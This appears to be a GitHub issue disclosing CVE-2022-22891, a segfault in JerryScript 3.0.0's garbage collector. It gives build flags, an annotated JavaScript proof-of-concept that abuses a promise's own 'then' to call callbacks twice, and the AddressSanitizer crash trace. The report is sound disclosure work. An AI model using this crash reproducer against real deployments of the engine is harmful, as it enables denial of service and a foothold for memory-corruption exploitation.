CVE-2022-22891: SEGV in ecma_ref_object_inline of ecma-gc.c · Issue #4871 · jerryscript-project/jerryscript

JerryScript 3.0.0 was discovered to contain a SEGV (segmentation fault) vulnerability via ecma_ref_object_inline in /jerry-core/ecma/base/ecma-gc.c.


JerryScript revision

Commit: 51da1551 Version: v3.0.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

Test case

/**
 * Prints one line of test output to the console.
 *
 * @param {string} str - the message to print
 */
function echo(str) {
  console.log(str);
}

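/**
 * Gives the promise `p` an own `then` that fulfils the consumer
 * synchronously and then also chains onto the real `Promise.prototype.then`.
 * `onFulfilled` is therefore invoked twice: once immediately (with `r`, or
 * with no argument when `u` is falsy) and once more when `p` itself settles.
 *
 * The posted test case reads `onFulfilled®;`, a typographic mangling of
 * `onFulfilled(r);` (`r` is otherwise unused); it is restored here.
 *
 * @param {Promise<unknown>} p - promise that receives the own `then` property
 * @param {unknown} [r] - value passed to `onFulfilled` when `u` is truthy
 * @param {boolean} [u] - when truthy, fulfil with `r`; otherwise with `undefined`
 * @returns {Promise<unknown>} the same object `p`, now carrying an own `then`
 */
function T(p, r, u) {
  return Object.assign(p, {
    then(onFulfilled, onRejected) {
      // Early, synchronous fulfilment — before the underlying promise settles.
      if (u) {
        onFulfilled(r);
      } else {
        onFulfilled();
      }
      // Second delivery of the same callbacks through the genuine promise path.
      return Promise.prototype.then.call(this, onFulfilled, onRejected);
    },
  });
}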

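/**
 * Runs test case `i`: wraps an already-resolved promise with `T`, hands it to
 * `Promise.all`, and reports the outcome through `echo`.
 *
 * The posted test case used typographic quotes around `success`, which does
 * not parse as a string literal; an ordinary single-quoted literal is
 * restored here. The quotes inside the template literal are left as posted.
 *
 * @param {number} i - test-case number used in the report line
 */
function JSEtest(i) {
  const ps = [T(Promise.resolve('success'))];
  Promise.all(ps)
    .then((res) => {
      // Per the ASAN trace on this page, the JerryScript 3.0.0 crash occurs
      // while this promise reaction job converts `res` (an array) to a string
      // for the template literal — Array.prototype.join reached via ToString.
      echo(`Test #${i} - Success with ‘${res}’ (length = ${res.length}) (isArray = ${Array.isArray(res)})`);
    })
    .catch((err) => {
      echo(`Test #${i} - Catch with ${err}`);
    });
}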

// Run the single test case; its report line is printed by `echo`.
const caseNumber = 1;
JSEtest(caseNumber);

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js

ASAN:DEADLYSIGNAL

==95503==ERROR: AddressSanitizer: SEGV on unknown address 0x41b58ab0 (pc 0x566075cf bp 0x1ff7c4b0 sp 0xffbe2500 T0)
==95503==The signal is caused by a READ memory access.
    #0 0x566075ce in ecma_ref_object_inline /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:136
    #1 0x56639c0c in ecma_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:913
    #2 0x56639c0c in ecma_fast_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:940
    #3 0x566cdd0b in ecma_op_object_find_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:647
    #4 0x566d2ea0 in ecma_op_object_find_own /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:494
    #5 0x566d2ea0 in ecma_op_object_get_with_receiver /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:879
    #6 0x567ef0cf in ecma_op_array_get_to_string_at_index /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:273
    #7 0x567ef0cf in ecma_builtin_array_prototype_join /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:322
    #8 0x567ef0cf in ecma_builtin_array_prototype_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2940
    #9 0x566731f1 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543
    #10 0x566731f1 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574
    #11 0x566b48b4 in ecma_op_function_call_native_built_in /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1243
    #12 0x566bae4d in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444
    #13 0x5668d365 in ecma_array_object_to_string /root/jerryscript/jerry-core/ecma/operations/ecma-array-object.c:1228
    #14 0x5681e945 in ecma_builtin_intrinsic_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-intrinsic.c:201
    #15 0x566731f1 in ecma_builtin_dispatch_routine /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543
    #16 0x566731f1 in ecma_builtin_dispatch_call /root/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574
    #17 0x566b48b4 in ecma_op_function_call_native_built_in /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1243
    #18 0x566bae4d in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444
    #19 0x566c9572 in ecma_op_general_object_ordinary_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:319
    #20 0x566c976b in ecma_op_general_object_default_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:284
    #21 0x566d6875 in ecma_op_object_default_value /root/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1780
    #22 0x566a905a in ecma_op_to_string /root/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:456
    #23 0x567b3433 in vm_loop /root/jerryscript/jerry-core/vm/vm.c:2820
    #24 0x567e21da in vm_execute /root/jerryscript/jerry-core/vm/vm.c:5260
    #25 0x567e7e7c in vm_run /root/jerryscript/jerry-core/vm/vm.c:5363
    #26 0x566b4101 in ecma_op_function_call_simple /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #27 0x566bae25 in ecma_op_function_call /root/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439
    #28 0x566c495e in ecma_process_promise_reaction_job /root/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:221
    #29 0x566c495e in ecma_process_all_enqueued_jobs /root/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:563
    #30 0x565d4dbc in jerry_run_jobs /root/jerryscript/jerry-core/api/jerryscript.c:1064
    #31 0x565c004b in main /root/jerryscript/jerry-main/main-jerry.c:326
    #32 0xf76f1f20 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18f20)
    #33 0x565c9359 (/root/jerryscript/build/bin/jerry+0x3b359)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/jerryscript/jerry-core/ecma/base/ecma-gc.c:136 in ecma_ref_object_inline
==95503==ABORTING

Credits: Found by OWL337 team.
